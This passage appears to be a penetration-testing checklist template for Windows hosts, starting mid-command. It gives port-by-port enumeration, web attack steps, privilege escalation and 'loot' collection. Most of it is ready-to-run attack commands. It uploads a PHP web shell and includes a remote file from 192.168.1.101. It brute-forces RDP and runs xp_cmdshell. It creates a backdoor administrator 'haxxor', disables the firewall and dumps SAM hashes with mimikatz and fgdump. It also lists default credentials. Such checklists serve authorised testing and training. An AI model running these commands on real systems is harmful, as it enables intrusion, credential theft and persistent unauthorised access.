--script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS ``` ### Port 22 - SSH - Name: - Version: - Protocol: - RSA-key-fingerprint: - Takes-password: If you have usernames test login with username:username INSERTSSHCONNECT ### Port 25 - Name: - Version: - VRFY: - EXPN: INSERTSMTPCONNECT ``` nc -nvv INSERTIPADDRESS 25 HELO foo nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS ``` ### Port 110 - Pop3 - Name: - Version: INSERTPOP3CONNECT ### Port 135 - MSRPC Some versions are vulnerable. ``` nmap INSERTIPADDRESS --script=msrpc-enum ``` Exploit: ``` msf > use exploit/windows/dcerpc/ms03_026_dcom ``` ### Port 139/445 - SMB - Name: - Version: - Domain/workgroup name: - Domain-sid: - Allows unauthenticated login: ``` nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 enum4linux -a INSERTIPADDRESS rpcclient -U "" INSERTIPADDRESS srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall smbclient -L INSERTIPADDRESS smbclient //INSERTIPADDRESS/tmp smbclient \\\\INSERTIPADDRESS\\ipc$ -U john smbclient //INSERTIPADDRESS/ipc$ -U john smbclient //INSERTIPADDRESS/admin$ -U john Log in with shell: winexe -U username //INSERTIPADDRESS "cmd.exe" --system ``` ### Port 161/162 UDP - SNMP ``` nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS snmp-check -t INSERTIPADDRESS -c public ``` ``` # Common community strings public private community ``` ### Port 554 - RTSP ### Port 1030/1032/1033/1038 Used by RPC to connect in domain network. Usually nothing. ### Port 1433 - MSSQL - Version: ``` use auxiliary/scanner/mssql/mssql_ping # Last options. Brute force. scanner/mssql/mssql_login # Log in to mssql sqsh -S INSERTIPADDRESS -U sa # Execute commands xp_cmdshell 'date' go ``` If you have credentials look in metasploit for other modules. ## Port 1521 - Oracle Name: Version: Password protected: ``` tnscmd10g version -h INSERTIPADDRESS tnscmd10g status -h INSERTIPADDRESS ``` ### Port 2100 - Oracle XML DB Can be accessed through ftp. Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm - Name: - Version: Default logins: ``` sys:sys scott:tiger ``` ### Port 2049 - NFS ``` showmount -e INSERTIPADDRESS If you find anything you can mount it like this: mount INSERTIPADDRESS:/ /tmp/NFS mount -t INSERTIPADDRESS:/ /tmp/NFS ``` ### 3306 - MySQL - Name: - Version: ``` mysql --host=INSERTIPADDRESS -u root -p nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306 ``` ### Port 3339 - Oracle web interface - Basic info about web service (apache, nginx, IIS) - Server: - Scripting language: - Apache Modules: - IP-address: - Domain-name address: ### Port 3389 - Remote desktop Test logging in to see what OS is running ``` rdesktop -u guest -p guest INSERTIPADDRESS -g 94% # Brute force ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS ``` ### Port 80 - Server: - Scripting language: - Apache Modules: - Domain-name address: INSERTCURLHEADER - Web application - Name: - Version: ``` # Nikto nikto -h http://INSERTIPADDRESS # Nikto with squid proxy nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 # Get header curl -i INSERTIPADDRESS # Get everything curl -i -L INSERTIPADDRESS # Check if it is possible to upload using put curl -v -X OPTIONS http://INSERTIPADDRESS/ curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php # Check for title and all links dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix ``` #### Nikto scan INSERTNIKTOSCAN #### Url brute force ``` # Dirb dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt # Gobuster - remove relevant responde codes (403 for example) gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e ``` INSERTDIRBSCAN #### Default/Weak login Google documentation for default passwords and test them: ``` site:webapplication.com password ``` ``` admin admin admin password admin admin nameofservice root root root admin root password root nameofservice password admin username nameofservice ``` #### LFI/RFI ``` # Kadimus /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= # Bypass execution http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index base64 -d savefile.php # Bypass extension http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00 http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt? ``` #### SQL-Injection ``` # Post ./sqlmap.py -r search-test.txt -p tfUPass # Get sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql # Crawl sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 ``` #### Sql-login-bypass - Open Burp-suite - Make and intercept request - Send to intruder - Cluster attack - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) - Attack - Check for response length variation ### Password brute force - last resort ``` cewl ``` ### Port 443 - HTTPS Heartbleed: ``` sslscan INSERTIPADDRESS:443 ``` ## Vulnerability analysis Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilities and features. ### To try - List of possibilities Add possible exploits here: ### Find sploits - Searchsploit and google Where there are many exploits for a software, use google. It will automatically sort it by popularity. ``` site:exploit-db.com apache 2.4.7 # Remove dos-exploits searchsploit Apache 2.4.7 | grep -v '/dos/' searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" # Only search the title (exclude the path), add the -t searchsploit -t Apache | grep -v '/dos/' ``` ---------------------------------------------------------------------------- '''''''''''''''''''''''''''''''''' PRIVESC ''''''''''''''''''''''''''''''''' ----------------------------------------------------------------------------- ## Privilege escalation Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order. - Kernel exploits - Cleartext password - Reconfigure service parameters - Inside service - Program running as root - Installed software - Scheduled tasks - Weak passwords ### To-try list Here you will add all possible leads. What to try. ### Basic info - OS: - Version: - Architecture: - Current user: - Hotfixes: - Antivirus: **Users:** **Localgroups:** ``` systeminfo set hostname net users net user user1 net localgroups accesschk.exe -uwcqv "Authenticated Users" * netsh firewall show state netsh firewall show config # Set path set PATH=%PATH%;C:\xampp\php ``` ### Kernel exploits ``` # Look for hotfixes systeminfo wmic qfe get Caption,Description,HotFixID,InstalledOn # Search for exploits site:exploit-db.com windows XX XX ``` ### Cleartext passwords ``` # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # SNMP Parameters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ### Reconfigure service parameters - Unquoted service paths Check book for instructions - Weak service permissions Check book for instructions ### Inside service Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside. ``` # Meterpreter run get_local_subnets netstat /a netstat -ano ``` ### Programs running as root/system ### Installed software ``` # Metasploit ps tasklist /SVC net start reg query HKEY_LOCAL_MACHINE\SOFTWARE DRIVERQUERY Look in: C:\Program files C:\Program files (x86) Home directory of the user ``` ### Scheduled tasks ``` schtasks /query /fo LIST /v Check this file: c:\WINDOWS\SchedLgU.Txt ``` ### Weak passwords Remote desktop ``` ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS ``` ### Useful commands **Add user and enable RDP** ``` net user haxxor Haxxor123 /add net localgroup Administrators haxxor /add net localgroup "Remote Desktop Users" haxxor /ADD # Enable RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Turn firewall off netsh firewall set opmode disable Or like this reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f If you get this error: "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ? Failed to connect, CredSSP required by server."" Add this reg key: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f ``` ------------------------------------------------------------------------ ----------------------------- LOOT LOOT LOOT LOOT ------------------- ------------------------------------------------------------------------ ## Loot - Proof: - Network secret: - Password and hashes: - Dualhomed: - Tcpdump: - Interesting files: - Databases: - SSH-keys: - Browser: ### Proof ### Network secret ### Passwords and hashes ``` wce32.exe -w wce64.exe -w fgdump.exe reg.exe save hklm\sam c:\sam_backup reg.exe save hklm\security c:\security_backup reg.exe save hklm\system c:\system # Meterpreter hashdump load mimikatz msv ``` ### Dualhomed ``` ipconfig /all route print # What other machines have been connected arp -a ``` ### Tcpdump ``` # Meterpreter run packetrecorder -li run packetrecorder -i 1 ``` ### Interesting files ``` #Meterpreter search -f *.txt search -f *.zip search -f *.doc search -f *.xls search -f config* search -f *.rar search -f *.docx search -f *.sql # How to cat files in meterpreter cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt # Recursive search dir /s ``` ### Mail ### Browser - Browser start-page: - Browser-history: - Saved passwords: ### Databases ### SSH-keys ## How to replicate: